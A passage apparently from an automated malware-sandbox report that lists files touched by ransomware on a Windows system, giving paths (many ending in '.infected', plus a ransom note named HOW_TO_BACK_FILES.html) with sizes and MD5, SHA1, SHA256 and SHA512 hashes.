                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          98784cab0b4e6e7ce65b08b8a1a720c9

                                                                                                                                          SHA1

                                                                                                                                          bf826a9f1b5c32aa42c345a9c456117f97035e9a

                                                                                                                                          SHA256

                                                                                                                                          7276195566f812e2c6f8b8ced7647cf903160f9dd73dd6ba4b3eb540781865c0

                                                                                                                                          SHA512

                                                                                                                                          2aa0700a80cd1fc7eed20f22492ac0781bacb188a55f38e05f861dbabc1ed841c8a2d47ee16d925727edd32575212322011c595a1c28237cc787e39f1a51b106

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_ON.GIF

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          bd3845477c369f46438b14f37f20bfea

                                                                                                                                          SHA1

                                                                                                                                          2cba279e4b24d741dcd9b504ff6b787915418dbd

                                                                                                                                          SHA256

                                                                                                                                          5196d0cd831938e86202c4f564474c4aff52dfa26de2537ffba19e4ee73b8672

                                                                                                                                          SHA512

                                                                                                                                          9985ead39ce6fda81b01f5277f519af3e9ceab9f55b45605cb879efbd6e26b0bdb14307eb0291c86f2c4738202d83ec17dd43c422440afc46839c069e5e5c97d

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\BUTTON.GIF

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          298b331a4bedf95b9ae820bab7b725bf

                                                                                                                                          SHA1

                                                                                                                                          b337737e414e64ddc769c711fbd799e7b753101f

                                                                                                                                          SHA256

                                                                                                                                          04c94f091a76d9bd6f3e11e4b470b406bf869e0faacec6bd17b23e3d98c12eb1

                                                                                                                                          SHA512

                                                                                                                                          39835c013fc4a4d70952d8deaf8cd72620b63c95ad6264825f57c031af2e2fc707b658d1bf19d01f9bb2d2f33731eb5ae4d4a725198ff4edd5e3d3c1916a702e

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          1c2ee5973c818179bc21bafc176e3761

                                                                                                                                          SHA1

                                                                                                                                          3d8314b49a086e9fc9e8568559f1cd717cc8b27f

                                                                                                                                          SHA256

                                                                                                                                          0382392299a83d6ea07ca6489e476c1b815205526b3c2ca5a2242dafc82d0894

                                                                                                                                          SHA512

                                                                                                                                          4ef8adca9c8d62769c0b6a9a484e6d40e00c14039e0c4917b2c28005a13c10b8419a6bf439cd444427216d0acd838947acf09e5ecdb86898d429245ce1817fcf

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          1494cf5a46c3b23c878c83b893996c69

                                                                                                                                          SHA1

                                                                                                                                          c8594f5616850211b0dc7e82f61bafc68ddd8c66

                                                                                                                                          SHA256

                                                                                                                                          19aabf582755ff74cb224181cb3a98a9e165988c52cdcc7a082ad9e1c1114ed2

                                                                                                                                          SHA512

                                                                                                                                          87b5736b2a20ccb6a6674e3a5f147b772b29f771812b366163ccfba97b53f90e0def2c6ea07e113a34abb2821058d268089e2358e03144f82d0e75f3d498af88

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          44a9cc4ffebc99661110c0360bb12689

                                                                                                                                          SHA1

                                                                                                                                          ff5b2bc603ffed12dcc0bb4d09b522facbf05bbd

                                                                                                                                          SHA256

                                                                                                                                          f9eece11843f46998288065810be7616d94fc2ee60f20a6a34a18a394e41fcb6

                                                                                                                                          SHA512

                                                                                                                                          5dea24a4e8be13436ac7e6a3816fd6dfaa8e9c8ffc9b535ef0090068457c8c61ae6698b287b2b8558f5b5b3f2e891943cb1b8d66cd7da8893ec1440f888b7e9f

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          7fc541e2a356cd8678f82a60639806b0

                                                                                                                                          SHA1

                                                                                                                                          22ffa7a0820d470ccd1e87e0cbe26cb2a41cb5f3

                                                                                                                                          SHA256

                                                                                                                                          a6040349a1b7a277124aa5453ce06c4798c3a58935d1917163448f2513a08cd2

                                                                                                                                          SHA512

                                                                                                                                          771c11f5e9e34a14a712a52f05a570d20325001b61d50edb9abb6011fba96ad3153ed47b5cee89f082f01317db27259fc43a67564371c8dfb770b4ac0ac1d3c2

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          fcf3f8a2371b904a59c97ea9dead60dc

                                                                                                                                          SHA1

                                                                                                                                          3f4b5bafcf9828fa0868ac5585e09c34c5d15edf

                                                                                                                                          SHA256

                                                                                                                                          35e8d4b8cd4feea2f59d1e59136af420f2fa76f42921386bb9724a5fdc8db7a4

                                                                                                                                          SHA512

                                                                                                                                          0b3e7910971cd554968e77aef5cbe8f13c1eed7e119006c0527f0fe7505b088abb7a1538ccdcc47caa5635533d4d926abdbbdccde9c8a5c9d551c256fe18d063

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          62fb1064fb64cefa9dca22b72c3fece8

                                                                                                                                          SHA1

                                                                                                                                          b2a15396fad1b0e66619c489dc1a2d8acfbc75a1

                                                                                                                                          SHA256

                                                                                                                                          abbbe84bfe5e950d7ead24c05971db38ce244104516063f955139d913142c6c3

                                                                                                                                          SHA512

                                                                                                                                          84080f9f88734267a6de986be9bac34ec26f5fa95e15be35abeedcbf42ede93bc9b92a23dbd8fb5dbf48ef681410b818860f9d8b275736c87e777b866db00944

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          1bd9b2dca6ae4e42aa530412f69d939f

                                                                                                                                          SHA1

                                                                                                                                          0b814377543d1a8aa275a6898089b2b317f034d1

                                                                                                                                          SHA256

                                                                                                                                          ffaeea56c18720a34a424777a69555be2a94ca808809e94a8deee75ad88f98b5

                                                                                                                                          SHA512

                                                                                                                                          dc462ae055600dd931df6c581e8319e8e49ef01f29bfeeb40b790c313532c69a7783c8b3aef2cbbf9831122a6817dbb3eafe6702209384057b056b541c963772

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          6d131195bab3b0e3764a6aae52447352

                                                                                                                                          SHA1

                                                                                                                                          8dba474586c2c2687d23dd7f4bcfd4ef42694a54

                                                                                                                                          SHA256

                                                                                                                                          fbbe5c7e7f8d78f8347d797c81a569817c4c81bcc6eea4a925d0f3f6a6b2336f

                                                                                                                                          SHA512

                                                                                                                                          6625daf5723045994fd57fe2ce98877c3ffcaf75a36c162f4a5bedd5041d07a65e4bb350f8056e9ea67cd2bf2cf4a9ebc37d89d6bc17f6f2bc548da5698a0c5b

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          fc4f28bad2232367757ee1ce93572bd9

                                                                                                                                          SHA1

                                                                                                                                          b9b950e5570029a8512c3a819c7d0fdc89ded6a2

                                                                                                                                          SHA256

                                                                                                                                          2a999ede73d0b2e8a632959a0c8557e7d0085dfc70601c9d329c7f2d7778a586

                                                                                                                                          SHA512

                                                                                                                                          dd80f1bc7f96c4dd5f1fbae44fb9ec106fbe689033aa55c7e0ddb58a4b314ebc85b012d8d961217841a636c0eeca8f0130faf1185a96b0a658d308a753f5a31e

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          a6aca18990b30c7b03d9d267b9bfe605

                                                                                                                                          SHA1

                                                                                                                                          c6a03f773f1133ff77eb8fd4e8a82409519504a1

                                                                                                                                          SHA256

                                                                                                                                          3e800b976344a7dd2973aed5f7042ee1d9f9032fcb4befcb551e57d7a7fb65ae

                                                                                                                                          SHA512

                                                                                                                                          c2c7b84bb98d7380192b5e378d4380075edcae7e54bf80b74df525f36b09093252438a4edc1637fc2c4da514011d6ccc654487954c5e5c8bbda63594e676ecbf

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          900d02b47cb7aaae0bfe14cd9b376f74

                                                                                                                                          SHA1

                                                                                                                                          2b798d7eb8580999b56626b33c5c19955b69e646

                                                                                                                                          SHA256

                                                                                                                                          41c77e3c6f3cb3446fdacc17e0b66dfb3078553a65efac6fdd77415e458d060e

                                                                                                                                          SHA512

                                                                                                                                          03f96c390febb8aa7f0762cbec5fae836f2d6ef9d88fc3a598875446a854a2f4c81d1c7e1d6a293b4ccfe2065fb107a0b2d1eeb88d35b725fb1d2197bd5bb33b

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.infected

                                                                                                                                          Filesize

                                                                                                                                          248KB

                                                                                                                                          MD5

                                                                                                                                          ef899b6429ea294a097bdda74dd97a69

                                                                                                                                          SHA1

                                                                                                                                          b16fb57162d9e4daf87f6e382abab04bee89a701

                                                                                                                                          SHA256

                                                                                                                                          9ce2a59df0679ccfbafbaa3bb522aff25e787d1212d1fc45253d796eb8a31419

                                                                                                                                          SHA512

                                                                                                                                          f9c438946daa9940c2143342a2972b102c9d90ca72f4b4d073e9b92373a254c1be2621e855555d5b48e19421346008d4ea4a9b6b0f9c18b8d974d2aa82bc9437

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\TALK21.COM.XML

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          bfd8822fba10856263e56548658d519a

                                                                                                                                          SHA1

                                                                                                                                          6371a05a879cb94f08d3eb984642fcfe2b09b9a9

                                                                                                                                          SHA256

                                                                                                                                          80df43b521f25fa2a046e01459f74fa633ac1d8d2f84054d40da251b6f25d400

                                                                                                                                          SHA512

                                                                                                                                          42b32c8979f767f54dd863583d718199dd7459a994c307d2d7126ed2187a8427e071d51690ef5cd7ea32ba901b4196c19ff6e8faba74f7504c3e4562621207eb

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.NO.XML

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          811635f156d75e3604ce3a8751ce81f7

                                                                                                                                          SHA1

                                                                                                                                          e87c5ddcc424a9a8a23b0273fb6a9f9d0be2cb2f

                                                                                                                                          SHA256

                                                                                                                                          41da1f55bff0c246c71f4e742640be15683b4a1783b3039c684a1480d2f41999

                                                                                                                                          SHA512

                                                                                                                                          d0f024188a4f58828d8327d4d7556b90f5987155ac8b43810937ba74843caba8fec707e8021eaafedd2032b0b31607d204431989243a3ab5144c8a58010d775e

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer

                                                                                                                                          Filesize

                                                                                                                                          7KB

                                                                                                                                          MD5

                                                                                                                                          f546018fa9865b6ace4bf5f7ae39caec

                                                                                                                                          SHA1

                                                                                                                                          c3602bb8743dd823890965a9ce5301003c535880

                                                                                                                                          SHA256

                                                                                                                                          660b561f1a51169c795046ad272d0d139b4f334a37a3d752ee40d89dfd9bdff2

                                                                                                                                          SHA512

                                                                                                                                          4971a0836e4a542d70e393cd72b362b298c5da2a2838d6ae2b88eb9f825af4194395967c2a0c375de64aba3c64c946216a4947d501e7c66ffdbf2dbda9b4dfe4

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.infected

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          03a4c9721d5e6fb3fc4abcd2ad9f9212

                                                                                                                                          SHA1

                                                                                                                                          ed259566713f4d818d4423967468633dcdf7984c

                                                                                                                                          SHA256

                                                                                                                                          3275523740d5961a14c6d83a51df5ed92fccb3adfadf14233e9d092309ff33fd

                                                                                                                                          SHA512

                                                                                                                                          7ca8c44d36f5952681439c95a4d553e5d97975f08399c8194f34bc0c6e6e12dd0b7178ff24806790705a325b40261eef4fd57aac2dd435de55acf70e8dc289b8

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          1305489f4a55d4aaea10ee7a22ef079b

                                                                                                                                          SHA1

                                                                                                                                          238b16b9622050aa6bd8599d4fc87ac50df13acb

                                                                                                                                          SHA256

                                                                                                                                          4d5ab55ae1d766a0ced618c4ba446471e46f0595638e4342735837a24a28b7c6

                                                                                                                                          SHA512

                                                                                                                                          33f57e77561d5d37dc5a0bd22823d4e7580bcef7c28c776386e9f47cce5bddffe99b1515f481831775fc31af6e1f56f856283d4f2dc721bfc8d1e345f7915666

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          aed4d293c52931f89cd344b6d017569b

                                                                                                                                          SHA1

                                                                                                                                          37459ddfd530a0d9679ed589aad728f8ab0b7d00

                                                                                                                                          SHA256

                                                                                                                                          0ad55117355c0b102d370a8373093b1eb02729643d927e62412ebc68680b557b

                                                                                                                                          SHA512

                                                                                                                                          cdc48a729fb8d51e7463cf40de5240bef022764d8e1338fbed8981bbd73d7b8ea4057d1dfcfc9f138190c1ccaa5a1449b995832ebcb38d6c053f1fe434765836

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          26d24c84b169ed7621db4c9d6a82ec53

                                                                                                                                          SHA1

                                                                                                                                          3dc942e99d7124c3ee50e59e1e7d2bd3fe53f9d1

                                                                                                                                          SHA256

                                                                                                                                          d86a3685e103366e53792a6b9a7eaca74ea56fd4b20b4f3cb1e3c6fb6fcbd845

                                                                                                                                          SHA512

                                                                                                                                          f742a402d14064eeea568294d16fdeae92bf814db2e421c3fce44b3008b4677ae055a506ff1dbc2f24be5f0d399055cfe3ab0a2c563e3c3ea9a46854bec6e9a7

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          124e30d672732e6fc7800e0b35457212

                                                                                                                                          SHA1

                                                                                                                                          bd55057aa1380d867b88c1983f2c480bfee53f0c

                                                                                                                                          SHA256

                                                                                                                                          7f0b824d6d7d37abd2b2975f5d9db7d2855b1d4dc674bc2ba6b6b8cd475dae52

                                                                                                                                          SHA512

                                                                                                                                          9e9b94261366361adf19bf4187a5999531b21a96ae17e2158619d25811a229e8033113737576d04df8ddf6ee1ea8939ced55509ad771bd8adc09622330dc93b5

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

                                                                                                                                          Filesize

                                                                                                                                          13KB

                                                                                                                                          MD5

                                                                                                                                          185ed89b35f68193ca4f49eca79290b2

                                                                                                                                          SHA1

                                                                                                                                          cfcb059c38eb2ebd95f3d433b7fa32e517c39c7e

                                                                                                                                          SHA256

                                                                                                                                          2ea10924ba4116d5d0add0e13309128a0dbc680dec7163993b22e7f46f63e3ff

                                                                                                                                          SHA512

                                                                                                                                          bd1f3e26405931f2d6465a114d40e70e52cbce9c7cd754816cf7957ab100acc929c937d9038a0e75e1963cd2d94d2ed8938ad46f1afbd0e9b511c9fdc6f2d607

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html

                                                                                                                                          Filesize

                                                                                                                                          10KB

                                                                                                                                          MD5

                                                                                                                                          adfe1bce278c8b6c07fecf75bc8cb899

                                                                                                                                          SHA1

                                                                                                                                          97b923695b3d27d5bae03b1ceb458d9a4ac9f5e2

                                                                                                                                          SHA256

                                                                                                                                          de7bda0f7393385f171775324d5a35e1c40054b691ce72a2e043e61984b28198

                                                                                                                                          SHA512

                                                                                                                                          40aeb9e639960febb61c77218f56e9e35b746ca57b3df5ca91fba9006e4959d77cb848c697aa5e468c5a134b3d4e81b6ff4e86ba6b216f56721ec357ad0b1418

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          aaa1dcb4b6b2cbcf6628542e8ce9be20

                                                                                                                                          SHA1

                                                                                                                                          886b1e35bf355107634a5a4e12d832654e5750a8

                                                                                                                                          SHA256

                                                                                                                                          916140d2f1d05320e7dd27e6f6e13b83b42c49bf93d99c8647f57688bcca1fda

                                                                                                                                          SHA512

                                                                                                                                          c2c81c42c76422368b8b1dad9620e97e853712761a5b0cf2b6c0878e9379f71be109f8fa08670c5307dbca17fcdbe3c2ed5ef97bc4b8d33658a7a3cdcee02fe4

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA

                                                                                                                                          Filesize

                                                                                                                                          9KB

                                                                                                                                          MD5

                                                                                                                                          80881b40bc14822560282edfeb5cab66

                                                                                                                                          SHA1

                                                                                                                                          bc7a83899ef5f2d08e95ffce5c8137c46c3b91e9

                                                                                                                                          SHA256

                                                                                                                                          54ed1efc1a7039f41cf20200cb4c187a40c3f599b9dd090426e850043bf450b3

                                                                                                                                          SHA512

                                                                                                                                          a42bdac3278f2199c42541be32f9881b5a33697cfd5bd5af38b44194cdb2c1ac9dbf9f13d7a0a22dcc306a06adea01fcef0013d28d4e60cd6e8acf6ed6b53eda

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

                                                                                                                                          Filesize

                                                                                                                                          12KB

                                                                                                                                          MD5

                                                                                                                                          8c2903c9f8c3ff038ba5e81496ffa88e

                                                                                                                                          SHA1

                                                                                                                                          c3aaab77902f15b26ce9d6cddfb2c2bafd714619

                                                                                                                                          SHA256

                                                                                                                                          e0585a3dd774276cc67a7a9222309bb959147e43b4eb81b0252c7faf43cc139f

                                                                                                                                          SHA512

                                                                                                                                          c6a21f408b45fc26ceb8c3d28a742e01d2c94df091d1b4e46477b8bf5db44bab3971df0470be3786dca2177d6fb2663a60f0a76cb41550c8cf879fb9b1ef47d0

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html

                                                                                                                                          Filesize

                                                                                                                                          10KB

                                                                                                                                          MD5

                                                                                                                                          dca48728f86b631d5fd1a206c38b2922

                                                                                                                                          SHA1

                                                                                                                                          1ee5d70ad5483879a19110af5277aa7d25e92b63

                                                                                                                                          SHA256

                                                                                                                                          ecbd951f3cd628df2ac3d8628c6d1b5b02cd6009bd583e898d92d19f0083184b

                                                                                                                                          SHA512

                                                                                                                                          398e788a1aa45be5afd2168a3634f85096388f6778e4336303e805b9cf2ac806ed7137ae06141ff1d5e0864ca9832d6ecbbc3be5357f81d0c5bd4c685ba26b64

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html

                                                                                                                                          Filesize

                                                                                                                                          13KB

                                                                                                                                          MD5

                                                                                                                                          36e69de3a0f952d1976088c704e425a4

                                                                                                                                          SHA1

                                                                                                                                          d0428343a1af3ebceb01204d6c3ee56489c9a6d6

                                                                                                                                          SHA256

                                                                                                                                          b3200c859ccb0763a6cb46d4832e70ad529da2d8d739588779900b8afaacbf78

                                                                                                                                          SHA512

                                                                                                                                          5c14120d2a45d543341fe6f620208a4ed8705ec6d3c34d167027b36b6315cf5d91e95925f8f63a8e42892245dbad696fde5b8120f0559bb68eddfb3b853bceea

                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-api-visual.xml_hidden

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          da3f2c09eeb1ccfebf44acbbe1eb84cb

                                                                                                                                          SHA1

                                                                                                                                          0c5ec6bb403303534c06608d476febed42986a7d

                                                                                                                                          SHA256

                                                                                                                                          ffb1bf9f43ecacfe01c80b7cecbdaf8396daa49f935a5650b7f005806d13174b

                                                                                                                                          SHA512

                                                                                                                                          d2bafefaaef8876059109eb35150fb474c3820cafaeecc371b1681ceadfce59e93780f509d2ea465f2baa9fcecada7c00d78538e53e832467b091b439ec3fb3b

                                                                                                                                        • C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          9e2b4d8ebb68b683840bf5964d4fff2d

                                                                                                                                          SHA1

                                                                                                                                          f58f367bcd758fbbc26d2b5491b71d40b67594c0

                                                                                                                                          SHA256

                                                                                                                                          649591be527ad8bb0cb34ee53921f2da9f9412e313fb2c161e7b54bb4989f5fa

                                                                                                                                          SHA512

                                                                                                                                          cbcdf4f3e02e2e2a79fbbca0a4af5e7a6cfd40edc32f54bb4fd3838aa5eab7ccd1691d68629c1067ac212233ffb4038c189a71fea40eaec234a59244b46b3d87

                                                                                                                                        • C:\Program Files\Java\jre7\lib\zi\Etc\UTC.infected

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          fcbf75476749e31aca4f14afe700482e

                                                                                                                                          SHA1

                                                                                                                                          ed62ba9974c6509909f94692207707dda8283e4e

                                                                                                                                          SHA256

                                                                                                                                          bd1d12dc7a8708ff370c7efe4292fdc040bfc4fb1e41b8bcb20ec84aa5042413

                                                                                                                                          SHA512

                                                                                                                                          42732a1492e215a53acc8a8679daa55bf3d70cf07f09fe5d58c6e7118171aef701f3ffd48f53ebdf1c3b141dc8d86b87a741b115fe22e24d3b338dfe96475b11

                                                                                                                                        • C:\Program Files\Java\jre7\lib\zi\SystemV\EST5

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          28c694803310be781eb918d7523c9233

                                                                                                                                          SHA1

                                                                                                                                          b2ef29a93f097a46798aba423e588b587c573b2d

                                                                                                                                          SHA256

                                                                                                                                          2cb719358a7674e1f0e213bbbb071bad49e929b96b8769393765e1b2d5a6d98b

                                                                                                                                          SHA512

                                                                                                                                          ed0814e8bf01dfa99f44908dfd39cb2c734608bb53d643ce7f2d3cb06919c41831eee31c8782054fc051ef136c780e94a0acfb77da164d5325f9bb85c382b8b9

                                                                                                                                        • C:\Program Files\Java\jre7\lib\zi\SystemV\HST10

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          8e79f9682c66c4e4ece5bc48cf8a7a3a

                                                                                                                                          SHA1

                                                                                                                                          a851a04fee26700f209454ba125b708bb4b54ca1

                                                                                                                                          SHA256

                                                                                                                                          5bd7b1c0f9d45604218628c119527e80f329613908c00152da1312e34ca887f1

                                                                                                                                          SHA512

                                                                                                                                          eef88238c382cd841fe674654755d12a9e920bcc96972c7765ddfb3e124321acdabca26f35995a711e6777bdb4eb0a3db83e8c4b58d9c0141d7c8e51a5710551

                                                                                                                                        • C:\Program Files\Java\jre7\lib\zi\SystemV\MST7

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          8330845b84a2b8fcdfb52131b17a595c

                                                                                                                                          SHA1

                                                                                                                                          82b35ac530762637310950929a9dadacd56361f0

                                                                                                                                          SHA256

                                                                                                                                          1094274d712a9ff2d589ff70389e75e846e0cb5b8565d2fff532ec2b70b24105

                                                                                                                                          SHA512

                                                                                                                                          cba232945a952a0df853a47cd379e9c19e161a0006fa5fdd59868f83b00508a38cb5782fd3098b5914e19a649efd9c0592b8e2ad585119725b16a9367cdcc489

                                                                                                                                        • C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo

                                                                                                                                          Filesize

                                                                                                                                          609KB

                                                                                                                                          MD5

                                                                                                                                          2ebe7920c0f1e4a6495bf69b30cdbd52

                                                                                                                                          SHA1

                                                                                                                                          b7c6dec35942dff7a0ec651988c2874fc9ab794f

                                                                                                                                          SHA256

                                                                                                                                          bad480c87ae2b7b7ff7bcb36afaa03a315781072eb9cebab9630eaa3ef55b586

                                                                                                                                          SHA512

                                                                                                                                          5f1c5e88271a2cc2338bdfecc0b3e809caf37b201afe05def4668d3dcfc8e99d7c9f47dd33c5d02051af20d669a30dcd1b786208ede05b391f25223c3acfcf77

                                                                                                                                        • C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          9d61121d40d5facba36956528574347c

                                                                                                                                          SHA1

                                                                                                                                          e839e5dbd065705f4ac33208e67d5ef8f3d64453

                                                                                                                                          SHA256

                                                                                                                                          3f0f8f467997bc3d157d61a8b7449c723c0cb3088977dfd11cb6f3cbda89c475

                                                                                                                                          SHA512

                                                                                                                                          29975a505687635e6551bc8dac24dc926d3208c62c4910d3780c86b3eb3f2eaa173428375359ac4c04df85c0364df0b3ef4160902a2dd4eea2f516d5aa0407bc

                                                                                                                                        • C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          9f0d5dadfc3def66868f30eb57239e35

                                                                                                                                          SHA1

                                                                                                                                          82f4ad7dee5f9f20cef44ef526fb326f986ab3e6

                                                                                                                                          SHA256

                                                                                                                                          844547a5d3841c21abbe6144b39819525206eedbb48bd17e1c0e02ac4c265f02

                                                                                                                                          SHA512

                                                                                                                                          c344f70ae9d3e1566b5a3e825f98fcf6536fb33f9d25a1c10aaf6b107ded0aa01edb4286fd1ba4a35ac3b9e9349d2a47e832c9765ea0054e9fb031f9eca75e74

                                                                                                                                        • C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          9d6ecb2c8a59b8b309aa5909cd477497

                                                                                                                                          SHA1

                                                                                                                                          c6094a6c6fbcc4c85f64cbb828c6f25c066e25f1

                                                                                                                                          SHA256

                                                                                                                                          1d7416951dbfc01871f9e854d8f2241f2320a01fc85ec9bf52cd6a6d4560ac69

                                                                                                                                          SHA512

                                                                                                                                          c193cb0241938e076a49cc5c7ac5bdfc43f21a7ac12e100691b3b52316cfbf61e13dc4558624b1eaae6848aa79f4ebdd985039de5b444ce47e2f0b426184f0b6

                                                                                                                                        • C:\ProgramData\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi

                                                                                                                                          Filesize

                                                                                                                                          181KB

                                                                                                                                          MD5

                                                                                                                                          0ab8cbf35cd5f1aa467e7fc32c58b7d0

                                                                                                                                          SHA1

                                                                                                                                          aa1566319fd3df47b6e70d6a656459c50d4b0cfc

                                                                                                                                          SHA256

                                                                                                                                          e0a2a061cf6b2480599194c3344354c2836fef1f7a94fb7dbaf8d95b16d52e96

                                                                                                                                          SHA512

                                                                                                                                          fd6f613419f949c23dc099bb4ccb89bbd8acaddf3021d07576f0c6487c45e1be7faba8587f3001ac258df7402c34d60efc5341d2623690fc134cc1dfa1890735

                                                                                                                                        • \Device\HarddiskVolume1\Boot\da-DK\HOW_TO_BACK_FILES.html

                                                                                                                                          Filesize

                                                                                                                                          3KB

                                                                                                                                          MD5

                                                                                                                                          a8514fd9f3a52ab2a00f57494d03b2fe

                                                                                                                                          SHA1

                                                                                                                                          0e204aabbd8b5d6ee1b36d10429d65eb436afd14

